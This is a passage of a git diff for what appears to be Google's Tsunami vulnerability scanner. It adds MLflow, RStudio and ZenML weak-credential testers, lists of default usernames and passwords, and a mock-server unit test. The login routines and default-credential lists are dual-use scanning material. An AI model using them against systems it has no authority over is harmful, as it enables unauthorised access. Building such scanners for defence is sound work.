%EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/GenericWeakCredentialDetectorBootstrapModule.java b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/GenericWeakCredentialDetectorBootstrapModule.java index 9845a3692..db865a24a 100644 --- a/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/GenericWeakCredentialDetectorBootstrapModule.java +++ b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/GenericWeakCredentialDetectorBootstrapModule.java @@ -39,11 +39,15 @@ import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.grafana.GrafanaCredentialTester; import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.hydra.HydraCredentialTester; import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.jenkins.JenkinsCredentialTester; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.mlflow.MlFlowCredentialTester; import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.mysql.MysqlCredentialTester; import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.ncrack.NcrackCredentialTester; import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.postgres.PostgresCredentialTester; import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.rabbitmq.RabbitMQCredentialTester; import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.wordpress.WordpressCredentialTester; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.rstudio.RStudioCredentialTester; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.zenml.ZenMlCredentialTester; + import java.io.FileNotFoundException; import java.io.IOException; import java.nio.file.Files; @@ -64,13 +68,16 @@ protected void configurePlugin() { Multibinder credentialTesterBinder = Multibinder.newSetBinder(binder(), CredentialTester.class); credentialTesterBinder.addBinding().to(JenkinsCredentialTester.class); + credentialTesterBinder.addBinding().to(MlFlowCredentialTester.class); credentialTesterBinder.addBinding().to(MysqlCredentialTester.class); credentialTesterBinder.addBinding().to(HydraCredentialTester.class); credentialTesterBinder.addBinding().to(NcrackCredentialTester.class); credentialTesterBinder.addBinding().to(PostgresCredentialTester.class); credentialTesterBinder.addBinding().to(WordpressCredentialTester.class); credentialTesterBinder.addBinding().to(GrafanaCredentialTester.class); + credentialTesterBinder.addBinding().to(RStudioCredentialTester.class); credentialTesterBinder.addBinding().to(RabbitMQCredentialTester.class); + credentialTesterBinder.addBinding().to(ZenMlCredentialTester.class); Multibinder credentialProviderBinder = Multibinder.newSetBinder(binder(), CredentialProvider.class); diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/provider/Top100Passwords.java b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/provider/Top100Passwords.java index 581f860e2..3a2d2afa5 100644 --- a/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/provider/Top100Passwords.java +++ b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/provider/Top100Passwords.java @@ -57,7 +57,8 @@ public final class Top100Passwords extends CredentialProvider { "ec2-user", "vagrant", "azureuser", - "cisco"); + "cisco", + "rstudio"); private static final ImmutableList TOP_100_PASSWORDS = ImmutableList.of( diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/mlflow/MlFlowCredentialTester.java b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/mlflow/MlFlowCredentialTester.java new file mode 100644 index 000000000..9b0cc5cf2 --- /dev/null +++ b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/mlflow/MlFlowCredentialTester.java @@ -0,0 +1,154 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.mlflow; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.tsunami.common.net.http.HttpRequest.get; +import static com.google.tsunami.common.net.http.HttpRequest.post; +import static java.nio.charset.StandardCharsets.UTF_8; + +import com.google.common.base.Strings; +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.gson.JsonObject; +import com.google.gson.JsonParser; +import com.google.gson.JsonSyntaxException; +import com.google.tsunami.common.data.NetworkEndpointUtils; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.provider.TestCredential; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.tester.CredentialTester; +import com.google.tsunami.proto.NetworkService; +import java.io.IOException; +import java.util.Base64; +import java.util.List; +import javax.inject.Inject; + +/** Credential tester specifically for mlflow. */ +public final class MlFlowCredentialTester extends CredentialTester { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private static final String MLFLOW_SERVICE = "mlflow"; + + private final HttpClient httpClient; + + @Inject + MlFlowCredentialTester(HttpClient httpClient) { + this.httpClient = checkNotNull(httpClient); + } + + @Override + public String name() { + return "MlFlowCredentialTester"; + } + + @Override + public String description() { + return "MlFlow credential tester."; + } + + @Override + public boolean canAccept(NetworkService networkService) { + return NetworkServiceUtils.getWebServiceName(networkService).equals(MLFLOW_SERVICE); + } + + @Override + public boolean batched() { + return true; + } + + @Override + public ImmutableList testValidCredentials( + NetworkService networkService, List credentials) { + // Always return 1st weak credential to gracefully handle no auth configured case, where we + // return empty credential instead of all the weak credentials + return credentials.stream() + .filter(cred -> isMlFlowAccessible(networkService, cred)) + .findFirst() + .map(ImmutableList::of) + .orElseGet(ImmutableList::of); + } + + private boolean isMlFlowAccessible(NetworkService networkService, TestCredential credential) { + var uriAuthority = NetworkEndpointUtils.toUriAuthority(networkService.getNetworkEndpoint()); + var url = + String.format( + "http://%s/%s?username=%s", + uriAuthority, "api/2.0/mlflow/users/get", credential.username()); + try { + logger.atInfo().log( + "url: %s, username: %s, password: %s", + url, credential.username(), credential.password().orElse("")); + HttpResponse response = sendRequestWithCredentials(url, credential); + return response.status().isSuccess() + && response + .bodyString() + .map(MlFlowCredentialTester::bodyContainsSuccessfulUserInfo) + .orElse(false); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", url); + return false; + } + } + + private HttpResponse sendRequestWithCredentials(String url, TestCredential credential) + throws IOException { + // For testing no-auth configured case, no auth header is passed in + if (Strings.isNullOrEmpty(credential.username()) + && Strings.isNullOrEmpty(credential.password().orElse(""))) { + return httpClient.send(post(url).withEmptyHeaders().build()); + } + + return httpClient.send( + get(url) + .setHeaders( + HttpHeaders.builder() + .addHeader( + "Authorization", + "basic " + + Base64.getEncoder() + .encodeToString( + (credential.username() + ":" + credential.password().orElse("")) + .getBytes(UTF_8))) + .build()) + .build()); + } + + /** + * A successful authenticated request to the /api/2.0/mlflow/users/get?username=admin endpoint + * returns a JSON with a root key like the following: + * {"user":{"experiment_permissions":[],"id":1,"is_admin":true,"registered_model_permissions":[], + * "username":"admin"}} + */ + private static boolean bodyContainsSuccessfulUserInfo(String responseBody) { + try { + JsonObject response = JsonParser.parseString(responseBody).getAsJsonObject(); + + if (response.has("user")) { + logger.atInfo().log("Successfully received a mlflow user info"); + return true; + } else { + return false; + } + } catch (JsonSyntaxException e) { + logger.atWarning().withCause(e).log( + "An error occurred while parsing the json response: %s", responseBody); + return false; + } + } +} diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/rstudio/RStudioCredentialTester.java b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/rstudio/RStudioCredentialTester.java new file mode 100644 index 000000000..67663e69b --- /dev/null +++ b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/rstudio/RStudioCredentialTester.java @@ -0,0 +1,254 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.rstudio; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.tsunami.common.net.http.HttpRequest.get; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.ByteString; +import com.google.tsunami.common.data.NetworkEndpointUtils; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.provider.TestCredential; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.tester.CredentialTester; +import com.google.tsunami.proto.NetworkService; +import java.io.IOException; +import java.math.BigInteger; +import java.security.InvalidKeyException; +import java.security.KeyFactory; +import java.security.NoSuchAlgorithmException; +import java.security.NoSuchProviderException; +import java.security.interfaces.RSAPublicKey; +import java.security.spec.InvalidKeySpecException; +import java.security.spec.RSAPublicKeySpec; +import java.util.List; +import java.util.Base64; +import java.util.Optional; +import javax.crypto.BadPaddingException; +import javax.crypto.Cipher; +import javax.crypto.IllegalBlockSizeException; +import javax.crypto.NoSuchPaddingException; +import javax.inject.Inject; +import org.jsoup.Jsoup; +import org.jsoup.nodes.Document; + +/** Credential tester for RStudio. */ +public final class RStudioCredentialTester extends CredentialTester { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private final HttpClient httpClient; + + private static final String RSTUDIO_SERVICE = "rstudio"; + private static final String RSTUDIO_HEADER = "RStudio"; + private static final String SERVER_HEADER = "Server"; + private static final String RSTUDIO_UNSUPPORTED_BROWSER_TITLE = "RStudio: Browser Not Supported"; + private static final String RSTUDIO_UNSUPPORTED_BROWSER_P = + "Your web browser is not supported by RStudio."; + + @Inject + RStudioCredentialTester(HttpClient httpClient) { + this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(false).build(); + } + + @Override + public String name() { + return "RStudioCredentialTester"; + } + + @Override + public boolean batched() { + return false; + } + + @Override + public String description() { + return "RStudio credential tester."; + } + + private static String buildTargetUrl(NetworkService networkService, String path) { + StringBuilder targetUrlBuilder = new StringBuilder(); + + if (NetworkServiceUtils.isWebService(networkService)) { + targetUrlBuilder.append(NetworkServiceUtils.buildWebApplicationRootUrl(networkService)); + } else { + // Default to HTTP protocol when the scanner cannot identify the actual service. + targetUrlBuilder + .append("http://") + .append(NetworkEndpointUtils.toUriAuthority(networkService.getNetworkEndpoint())) + .append("/"); + } + targetUrlBuilder.append(path); + return targetUrlBuilder.toString(); + } + + /** + * Determines if this tester can accept the {@link NetworkService} based on the name of the + * service or a custom fingerprint. The fingerprint is necessary since nmap doesn't recognize a + * rstudio server instance correctly. + * + * @param networkService the network service passed by tsunami + * @return true if a rstudio server instance is recognized + */ + @Override + public boolean canAccept(NetworkService networkService) { + boolean canAcceptByNmapReport = + NetworkServiceUtils.getWebServiceName(networkService).equals(RSTUDIO_SERVICE); + if (canAcceptByNmapReport) { + return true; + } + boolean canAcceptByCustomFingerprint = false; + String url = buildTargetUrl(networkService, "unsupported_browser.htm"); + try { + logger.atInfo().log("Probing RStudio - custom fingerprint phase"); + HttpResponse response = httpClient.send(get(url).withEmptyHeaders().build()); + canAcceptByCustomFingerprint = + response.status().isSuccess() + && response.headers().get(SERVER_HEADER).isPresent() + && response.headers().get(SERVER_HEADER).get().equals(RSTUDIO_HEADER) + && response + .bodyString() + .map(RStudioCredentialTester::bodyContainsRStudioElements) + .orElse(false); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", url); + return false; + } + return canAcceptByCustomFingerprint; + } + + private static boolean bodyContainsRStudioElements(String responseBody) { + Document doc = Jsoup.parse(responseBody); + String title = doc.title(); + String p = + doc.body().getElementsByTag("p").first().outerHtml().split("

")[1].split("

")[0]; + + if (title.contains(RSTUDIO_UNSUPPORTED_BROWSER_TITLE) + && p.contains(RSTUDIO_UNSUPPORTED_BROWSER_P)) { + logger.atInfo().log("Found RStudio endpoint"); + return true; + } else { + return false; + } + } + + @Override + public ImmutableList testValidCredentials( + NetworkService networkService, List credentials) { + + return credentials.stream() + .filter(cred -> isRStudioAccessible(networkService, cred)) + .findFirst() + .map(ImmutableList::of) + .orElseGet(ImmutableList::of); + } + + private boolean isRStudioAccessible(NetworkService networkService, TestCredential credential) { + var url = buildTargetUrl(networkService, "auth-public-key"); + try { + logger.atInfo().log("Retrieving public key"); + HttpResponse response = httpClient.send(get(url).withEmptyHeaders().build()); + Optional body = response.bodyString(); + String exponent = body.get().split(":")[0]; + String modulus = body.get().split(":")[1]; + + url = buildTargetUrl(networkService, "auth-do-sign-in"); + logger.atInfo().log( + "url: %s, username: %s, password: %s", + url, credential.username(), credential.password().orElse("")); + response = sendRequestWithCredentials(url, credential, exponent, modulus); + + if (response.headers().get("Set-Cookie").isPresent()) { + for (String s : response.headers().getAll("Set-Cookie")) { + if (s.contains("user-id=" + credential.username())) { + logger.atInfo().log("Found valid credentials"); + return true; + } + } + } else { + return false; + } + } catch (IOException + | NoSuchProviderException + | NoSuchAlgorithmException + | BadPaddingException + | IllegalBlockSizeException + | InvalidKeyException + | NoSuchPaddingException + | InvalidKeySpecException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", url); + } + return false; + } + + // This function base64 encodes provided cipertext string in hex. + private String hexToBase64(String hex) { + return Base64.getEncoder().encodeToString(new BigInteger(hex, 16).toByteArray()); + } + + private HttpResponse sendRequestWithCredentials( + String url, TestCredential credential, String exponent, String modulus) + throws NoSuchAlgorithmException, + BadPaddingException, + IllegalBlockSizeException, + InvalidKeyException, + NoSuchPaddingException, + InvalidKeySpecException, + IOException, + NoSuchProviderException { + // Encrypting with RSA PCKS#1 version 2. + RSAPublicKeySpec spec = + new RSAPublicKeySpec(new BigInteger(modulus, 16), new BigInteger(exponent, 16)); + KeyFactory factory = KeyFactory.getInstance("RSA"); + RSAPublicKey key = (RSAPublicKey) factory.generatePublic(spec); + + Cipher cipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + cipher.init(Cipher.ENCRYPT_MODE, key); + + StringBuilder sb = new StringBuilder(); + sb.append(credential.username()); + sb.append("\n"); + sb.append(credential.password().get()); + byte[] cipherData = cipher.doFinal(sb.toString().getBytes()); + + // Converting the ciphertext to hex. + sb = new StringBuilder(); + for (byte b : cipherData) { + sb.append(String.format("%02X", b)); + } + + String ciphertext = this.hexToBase64(sb.toString().toLowerCase()); + var headers = + HttpHeaders.builder() + .addHeader("Cookie", "rs-csrf-token=1") + .addHeader("Content-Type", "application/x-www-form-urlencoded") + .build(); + + sb = new StringBuilder(); + sb.append("rs-csrf-token=1&"); + sb.append("v=" + ciphertext.replaceAll("\\+", "%2b").replaceAll("=", "%3d")); + return httpClient.send( + post(url) + .setHeaders(headers) + .setRequestBody(ByteString.copyFrom(sb.toString().getBytes())) + .build()); + } +} diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/zenml/ZenMlCredentialTester.java b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/zenml/ZenMlCredentialTester.java new file mode 100644 index 000000000..39f071d77 --- /dev/null +++ b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/zenml/ZenMlCredentialTester.java @@ -0,0 +1,153 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.zenml; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.gson.JsonObject; +import com.google.gson.JsonParser; +import com.google.gson.JsonSyntaxException; +import com.google.protobuf.ByteString; +import com.google.tsunami.common.data.NetworkEndpointUtils; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.provider.TestCredential; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.tester.CredentialTester; +import com.google.tsunami.proto.NetworkService; +import java.io.IOException; +import java.util.List; +import javax.inject.Inject; + +/** Credential tester specifically for zenml. */ +public final class ZenMlCredentialTester extends CredentialTester { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private static final String ZENML_SERVICE = "zenml"; + + private final HttpClient httpClient; + + @Inject + ZenMlCredentialTester(HttpClient httpClient) { + this.httpClient = checkNotNull(httpClient); + } + + @Override + public String name() { + return "ZenMlCredentialTester"; + } + + @Override + public String description() { + return "ZenMl credential tester."; + } + + @Override + public boolean canAccept(NetworkService networkService) { + return NetworkServiceUtils.getWebServiceName(networkService).equals(ZENML_SERVICE); + } + + @Override + public boolean batched() { + return true; + } + + @Override + public ImmutableList testValidCredentials( + NetworkService networkService, List credentials) { + // Always return 1st weak credential to gracefully handle no auth configured case, where we + // return empty credential instead of all the weak credentials + return credentials.stream() + .filter(cred -> isZenMlAccessible(networkService, cred)) + .findFirst() + .map(ImmutableList::of) + .orElseGet(ImmutableList::of); + } + + private boolean isZenMlAccessible(NetworkService networkService, TestCredential credential) { + var uriAuthority = NetworkEndpointUtils.toUriAuthority(networkService.getNetworkEndpoint()); + var loginApiUrl = String.format("http://%s/%s", uriAuthority, "api/v1/login"); + try { + HttpResponse apiLoginResponse = + httpClient.send( + post(loginApiUrl) + .setHeaders( + HttpHeaders.builder() + .addHeader("Content-Type", "application/x-www-form-urlencoded") + .build()) + .setRequestBody( + ByteString.copyFromUtf8( + String.format( + "username=%s&password=%s", + credential.username(), credential.password().orElse("")))) + .build()); + + if (apiLoginResponse.status() == HttpStatus.UNAUTHORIZED + && apiLoginResponse.bodyString().isPresent() + && apiLoginResponse + .bodyString() + .get() + .equals( + "{\"detail\":[\"AuthorizationException\"," + + "\"Authentication error: invalid username or password\"]}")) { + return false; + } + + if (apiLoginResponse.status() == HttpStatus.OK + && apiLoginResponse.bodyString().isPresent() + && bodyContainsSuccessfulAccessToken(apiLoginResponse.bodyString().get())) { + logger.atWarning().log("=============================================="); + return true; + } + + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", loginApiUrl); + return false; + } + return false; + } + + /** + * A successful authenticated request to the /api/v1/login endpoint returns a JSON with a root key + * like the following: {"access_token":"An Access + * Token","token_type":"bearer","expires_in":null,"refresh_token":null,"scope":null} + */ + private static boolean bodyContainsSuccessfulAccessToken(String responseBody) { + try { + JsonObject response = JsonParser.parseString(responseBody).getAsJsonObject(); + + if (response.has("access_token") + && response.has("token_type") + && response.has("refresh_token") + && response.has("scope") + && response.has("expires_in")) { + logger.atInfo().log("Successfully logged in as a zenml user"); + return true; + } else { + return false; + } + } catch (JsonSyntaxException e) { + logger.atWarning().withCause(e).log( + "An error occurred while parsing the json response: %s", responseBody); + return false; + } + } +} diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/main/resources/detectors/credentials/genericweakcredentialdetector/data/service_default_credentials.textproto b/google/detectors/credentials/generic_weak_credential_detector/src/main/resources/detectors/credentials/genericweakcredentialdetector/data/service_default_credentials.textproto index 35d38fddf..653b4e5ae 100644 --- a/google/detectors/credentials/generic_weak_credential_detector/src/main/resources/detectors/credentials/genericweakcredentialdetector/data/service_default_credentials.textproto +++ b/google/detectors/credentials/generic_weak_credential_detector/src/main/resources/detectors/credentials/genericweakcredentialdetector/data/service_default_credentials.textproto @@ -55,8 +55,31 @@ service_default_credentials { default_usernames: "admin" default_passwords: "admin" } +service_default_credentials { + service_name: "rstudio" + default_usernames: "rstudio" + default_passwords: "rstudio" +} service_default_credentials { service_name: "rabbitmq" default_usernames: "guest" default_passwords: "guest" } + +service_default_credentials { + service_name: "mlflow" + default_usernames: "user_a" + default_passwords: "password_a" + default_usernames: "user_b" + default_passwords: "password_b" + default_usernames: "admin" + default_passwords: "password" + default_usernames: "username" + default_passwords: "password" +} + +service_default_credentials { + service_name: "zenml" + default_usernames: "default" + default_passwords: "" +} diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/mlflow/MlFlowCredentialTesterTest.java b/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/mlflow/MlFlowCredentialTesterTest.java new file mode 100644 index 000000000..e6342a5c1 --- /dev/null +++ b/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/mlflow/MlFlowCredentialTesterTest.java @@ -0,0 +1,204 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.mlflow; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; +import static org.mockito.ArgumentMatchers.any; +import static org.mockito.Mockito.verifyNoInteractions; +import static org.mockito.Mockito.when; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.tsunami.common.net.db.ConnectionProviderInterface; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.provider.TestCredential; +import com.google.tsunami.proto.NetworkService; +import java.io.IOException; +import java.sql.Connection; +import java.util.Objects; +import java.util.Optional; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.Before; +import org.junit.Rule; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; +import org.mockito.Mock; +import org.mockito.junit.MockitoJUnit; +import org.mockito.junit.MockitoRule; + +/** Tests for {@link MlFlowCredentialTester}. */ +@RunWith(JUnit4.class) +public class MlFlowCredentialTesterTest { + @Rule public MockitoRule rule = MockitoJUnit.rule(); + @Mock private ConnectionProviderInterface mockConnectionProvider; + @Mock private Connection mockConnection; + @Inject private MlFlowCredentialTester tester; + private MockWebServer mockWebServer; + private static final TestCredential WEAK_CRED_1 = + TestCredential.create("admin", Optional.of("password")); + private static final TestCredential WEAK_CRED_2 = + TestCredential.create("username", Optional.of("password")); + private static final TestCredential WRONG_CRED_1 = + TestCredential.create("wrong", Optional.of("wrong")); + + // The base64 encoding of default authentication username:password pairs which the tester will + // send these headers to our mock webserver + private static final String WEAK_CRED_AUTH_1 = "basic dXNlcm5hbWU6cGFzc3dvcmQ="; + private static final String WEAK_CRED_AUTH_2 = "basic YWRtaW46cGFzc3dvcmQ="; + + @Before + public void setup() { + mockWebServer = new MockWebServer(); + Guice.createInjector(new HttpClientModule.Builder().build()).injectMembers(this); + } + + @Test + public void detect_weakCredentialsExists_returnsWeakCredentials() throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("mlflow") + .build(); + + assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WEAK_CRED_1))) + .containsExactly(WEAK_CRED_1); + mockWebServer.shutdown(); + } + + @Test + public void detect_weakCredentialsExist_returnsFirstWeakCredentials() throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("mlflow") + .build(); + + assertThat( + tester.testValidCredentials( + targetNetworkService, ImmutableList.of(WEAK_CRED_1, WEAK_CRED_2))) + .containsExactly(WEAK_CRED_1); + } + + @Test + public void detect_mlflowService_canAccept() throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("mlflow") + .build(); + + assertThat(tester.canAccept(targetNetworkService)).isTrue(); + } + + @Test + public void detect_weakCredentialsExistAndMlflowInForeignLanguage_returnsFirstWeakCredentials() + throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("mlflow") + .build(); + + assertThat( + tester.testValidCredentials( + targetNetworkService, ImmutableList.of(WEAK_CRED_1, WEAK_CRED_2))) + .containsExactly(WEAK_CRED_1); + } + + @Test + public void detect_noWeakCredentials_returnsNoCredentials() throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("mlflow") + .build(); + assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WRONG_CRED_1))) + .isEmpty(); + } + + @Test + public void detect_nonMlflowService_skips() throws Exception { + when(mockConnectionProvider.getConnection(any(), any(), any())).thenReturn(mockConnection); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint(forHostnameAndPort("example.com", 8080)) + .setServiceName("http") + .build(); + + assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WEAK_CRED_1))) + .isEmpty(); + verifyNoInteractions(mockConnectionProvider); + } + + private void startMockWebServer() throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + final MockResponse unauthorizedResponse = + new MockResponse() + .setResponseCode(401) + .setBody( + "You are not authenticated. " + + "Please see https://www.mlflow.org/docs/latest/auth/index.html" + + "#authenticating-to-mlflow " + + "on how to authenticate"); + + @Override + public MockResponse dispatch(RecordedRequest request) { + String authorizationHeader = request.getHeaders().get("Authorization"); + if (authorizationHeader == null) { + return unauthorizedResponse; + } + if (request.getPath().matches("/api/2.0/mlflow/users/get\\?.*") + && Objects.equals(request.getMethod(), "GET")) { + boolean isDefaultCredentials = + authorizationHeader.equals(WEAK_CRED_AUTH_1) + || authorizationHeader.equals(WEAK_CRED_AUTH_2); + if (isDefaultCredentials) { + return new MockResponse() + .setResponseCode(200) + .setBody( + "{\"user\":{\"experiment_permissions\":[],\"id\":1,\"is_admin\":true," + + "\"registered_model_permissions\":[]," + + "\"username\":\"admin\"}}"); + } else { + return unauthorizedResponse; + } + } + return new MockResponse().setResponseCode(404); + } + }; + mockWebServer.setDispatcher(dispatcher); + mockWebServer.start(); + mockWebServer.url("/"); + } +} diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/rstudio/RStudioCredentialTesterTest.java b/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/rstudio/RStudioCredentialTesterTest.java new file mode 100644 index 000000000..fbf4caccd --- /dev/null +++ 